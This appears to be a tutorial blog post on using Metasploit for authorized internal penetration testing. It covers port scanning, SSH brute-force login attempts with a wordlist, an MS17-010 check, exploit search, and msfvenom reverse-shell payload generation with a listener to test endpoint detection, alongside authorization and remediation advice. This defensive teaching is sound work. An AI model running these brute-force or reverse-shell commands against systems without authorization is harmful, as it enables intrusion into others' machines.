When Do You Actually Know Your System Has Vulnerabilities?
The honest answer: when an attacker finds them before you do. That’s why sysadmins and security engineers need to proactively “hack” their own systems — before someone else does it for them.
After auditing security on 10+ servers, I’ve found most share the same basic vulnerabilities: services running outdated versions, unnecessary open ports, or unchanged default credentials. These seemingly minor issues are actually the most common entry points in real-world attacks. A solid starting point is following a comprehensive Linux server hardening checklist before running any pentest.
Metasploit Framework is the tool security professionals use to accurately simulate those attacks — in a controlled environment, with explicit authorization. This guide walks through how to use Metasploit responsibly to test your own internal systems.
What Is Metasploit and How Does It Work?
Metasploit Framework is an open-source platform written in Ruby, created in 2003 and now featuring over 2,400 ready-to-use modules. If you’ve ever read a pentest report from any security firm, chances are they used Metasploit at some point in their process.
Key Concepts to Know First
- Module: The functional unit in Metasploit. There are 4 main types:
exploit(attacks a vulnerability),auxiliary(scan/fingerprint),payload(code that runs after a successful exploit),post(actions taken after gaining access). - msfconsole: The primary command-line interface for Metasploit.
- RHOSTS / RPORT: The IP address and port of the target machine.
- LHOST / LPORT: The IP address and port of your machine (attacker/listener).
- Session: The connection established after a successful exploit — for example, a shell or Meterpreter.
A rule you cannot skip: Only run Metasploit on systems you own or have explicit written authorization to test. Using it on unauthorized systems is illegal — no exceptions.
Installing Metasploit on Kali Linux / Ubuntu
Kali Linux comes with Metasploit pre-installed. If you’re on Ubuntu or Debian, install it as follows:
# Install Metasploit on Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Initialize the database on first run
msfdb init
# Open the console
msfconsoleThe first time you run msfconsole, it will take a few minutes to initialize. Once you see the msf6 > prompt, you’re in.
Hands-On: Testing Your Internal Systems Step by Step
A standard pentest workflow follows 3 phases: Scan → Identify → Test. Here’s each step with concrete examples.
Step 1 — Scan to Discover Hosts and Services
Before using Metasploit, you need to know what’s on your internal network. Use the auxiliary/scanner module:
# Inside msfconsole
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,443,3306,5432,8080,8443
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 20
msf6 auxiliary(scanner/portscan/tcp) > runOr use Nmap integrated directly into Metasploit for more detailed results:
msf6 > db_nmap -sV -O 192.168.1.0/24
# -sV: detect service version
# -O: detect OS
# View results saved to the database
msf6 > hosts
msf6 > servicesStep 2 — Test Whether SSH Is Vulnerable to Brute-Force
SSH with weak passwords is the most common vulnerability I encounter — and also the easiest to fix once discovered. Metasploit has a module to test for this:
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/common-passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf6 auxiliary(scanner/ssh/ssh_login) > runDid the module find a password? Address it immediately: switch to key-based auth, disable direct root login over SSH, or enable 2FA with Google Authenticator. For an even stronger layer of protection, consider securing SSH with hardware security keys (FIDO2/YubiKey).
Step 3 — Test for Vulnerabilities in Specific Services
Suppose a scan reveals a machine running an old version of Samba (SMB). Here’s how to check whether it’s vulnerable to EternalBlue (MS17-010) — the exploit used in the 2017 WannaCry attack:
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.55
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
# Output if vulnerable:
# [+] 192.168.1.55:445 - Host is likely VULNERABLE to MS17-010!Note: The auxiliary/scanner module only checks (detects) — it doesn’t actually exploit. This is the safe way to confirm a vulnerability exists. For automated scanning across a broader attack surface, Nuclei is another powerful tool for vulnerability detection worth adding to your toolkit.
Step 4 — Find the Right Module for a Discovered Vulnerability
Already know which version a service is running? Use search to find the corresponding exploit:
# Search for exploits related to vsftpd 2.3.4 (famous backdoor)
msf6 > search vsftpd
# Search by CVE
msf6 > search cve:2021-44228
# Search for modules related to Apache
msf6 > search name:apache type:exploitStep 5 — Use msfvenom to Test Endpoint Detection
Another useful exercise is checking whether the antivirus/EDR on your systems can detect a payload. msfvenom lets you generate payloads for testing:
# Generate a Linux reverse shell payload (lab use only)
msfvenom -p linux/x64/shell_reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o test_payload.elf
# In msfconsole, open a listener to receive the connection
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.10
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > runIf the payload runs on your test machine with no alerts triggered, that’s a clear signal to review your entire security monitoring configuration. Tools like osquery for real-time security monitoring can help fill those detection gaps.
Step 6 — Document Your Findings
Metasploit can log entire sessions — handy for writing reports afterward:
# Log console output to a file
msf6 > spool /tmp/pentest-report-$(date +%Y%m%d).log
# Export results from the database
msf6 > hosts -o /tmp/hosts.csv
msf6 > vulns -o /tmp/vulns.csv
# Turn off spool when done
msf6 > spool offWhat to Do Before You Start
Here’s a short checklist I always go through before any internal pentest:
- Get written authorization from management or the system owner — even if it’s a server at your own company.
- Define the scope clearly: which IPs are in scope, which are off-limits (production systems, primary databases, etc.).
- Pick a low-impact time window: Heavy network scans can slow down systems. Best to run them off-peak — 11pm to 5am is usually a safe window.
- Have a rollback plan: Some exploits can crash services — know how to restart them if needed.
- Don’t store real credentials in your lab: Use separate test passwords for your testing environment.
Conclusion
You don’t need to be a professional pentester to use Metasploit effectively. Mastering 4–5 core auxiliary modules is enough for a sysadmin to run periodic audits and catch the majority of common vulnerabilities.
Following proper process is non-negotiable: get authorization, define scope, document everything, and remediate what you find right away. An internal pentest session typically takes only 3–4 hours. That investment is far smaller than the cost of a real incident — according to the IBM Cost of a Data Breach Report 2023, the average data breach costs $4.45 million USD.
Patch it, reconfigure it, run the scan again to confirm it’s fixed — that’s the complete security hardening loop. To track every change made during remediation, pair this workflow with auditd as your system’s black box for change tracking.
